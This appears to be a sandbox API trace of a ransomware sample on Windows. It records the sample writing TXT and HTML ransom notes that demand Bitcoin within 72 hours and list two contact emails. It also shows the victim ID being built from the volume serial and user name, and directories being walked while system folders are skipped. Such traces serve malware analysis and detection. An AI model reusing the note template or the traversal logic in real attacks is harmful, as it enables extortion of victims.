	[0178.326] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0178.332] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.332] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.332] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0178.333] CloseHandle (hObject=0x388) returned 1
	[0178.333] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.333] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.333] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.334] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0178.334] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0178.338] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.338] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0178.341] CloseHandle (hObject=0x388) returned 1
	[0178.341] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.341] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.342] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0178.355] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.355] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0178.361] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.361] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.361] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0178.361] CloseHandle (hObject=0x388) returned 1
	[0178.362] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x83d3a058, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.362] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*") returned 51
	[0178.362] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.362] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*") returned 0x33
	[0178.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.363] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="windows") returned 0x0
	[0178.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.363] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="boot") returned 0x0
	[0178.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.363] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="system volume information") returned 0x0
	[0178.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.363] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.364] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="temp") returned 0x0
	[0178.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.364] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="program files") returned 0x0
	[0178.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.364] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.364] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="appdata") returned 0x0
	[0178.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.365] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="application data") returned 0x0
	[0178.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.365] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="winnt") returned 0x0
	[0178.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.365] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="tmp") returned 0x0
	[0178.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.365] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\installcache_x64\\*.*", lpSrch="cache") returned="cache_x64\\*.*"
	[0178.365] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.366] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xab77de3d, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xab77de3d, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="installcache_x64", cAlternateFileName="INSTAL~1")) returned 0
	[0178.366] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0178.366] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0178.366] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0
	[0178.366] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.367] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.367] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1
	[0178.367] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1
	[0178.367] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1
	[0178.367] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.367] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.368] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Package Cache" | out: lpString1="C:\\Users\\All Users\\Package Cache") returned="C:\\Users\\All Users\\Package Cache"
	[0178.368] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Package Cache") returned="C:\\Users\\All Users\\Package Cache"
	[0178.368] lstrcatW (in: lpString1="C:\\Users\\All Users\\Package Cache", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Package Cache\\") returned="C:\\Users\\All Users\\Package Cache\\"
	[0178.368] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Package Cache\\" | out: lpString1="C:\\Users\\All Users\\Package Cache\\") returned="C:\\Users\\All Users\\Package Cache\\"
	[0178.368] lstrcatW (in: lpString1="C:\\Users\\All Users\\Package Cache\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Package Cache\\*.*") returned="C:\\Users\\All Users\\Package Cache\\*.*"
	[0178.368] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\*.*" (normalized: "c:\\users\\all users\\package cache\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.377] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\*.*") returned 36
	[0178.378] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.378] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\package cache\\*.*") returned 0x24
	[0178.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.378] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="windows") returned 0x0
	[0178.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.378] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="boot") returned 0x0
	[0178.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.379] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="system volume information") returned 0x0
	[0178.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.379] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.379] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="temp") returned 0x0
	[0178.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.379] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="program files") returned 0x0
	[0178.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.380] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.380] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="appdata") returned 0x0
	[0178.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.380] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="application data") returned 0x0
	[0178.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.380] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="winnt") returned 0x0
	[0178.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.381] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="tmp") returned 0x0
	[0178.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.381] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0178.381] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.383] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Package Cache") returned="C:\\Users\\All Users\\Package Cache"
	[0178.383] lstrcatW (in: lpString1="C:\\Users\\All Users\\Package Cache", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Package Cache\\*.*") returned="C:\\Users\\All Users\\Package Cache\\*.*"
	[0178.384] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.384] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.384] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.TXT") returned 60
	[0178.384] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\package cache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.395] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.395] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.398] CloseHandle (hObject=0x380) returned 1
	[0178.398] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.399] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.400] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.400] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\package cache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.400] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.400] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.400] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.400] CloseHandle (hObject=0x380) returned 1
	[0178.401] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.401] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.401] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.401] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.HTML") returned 61
	[0178.401] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\package cache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.402] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.402] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.405] CloseHandle (hObject=0x380) returned 1
	[0178.405] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.405] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.406] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.407] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.407] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\package cache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.413] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.413] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.413] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.413] CloseHandle (hObject=0x380) returned 1
	[0178.413] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\*.*" (normalized: "c:\\users\\all users\\package cache\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x83dd2ae6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0178.414] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\*.*") returned 36
	[0178.414] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.414] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\package cache\\*.*") returned 0x24
	[0178.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.414] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="windows") returned 0x0
	[0178.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.415] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="boot") returned 0x0
	[0178.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.415] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="system volume information") returned 0x0
	[0178.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.415] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.415] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="temp") returned 0x0
	[0178.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.416] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="program files") returned 0x0
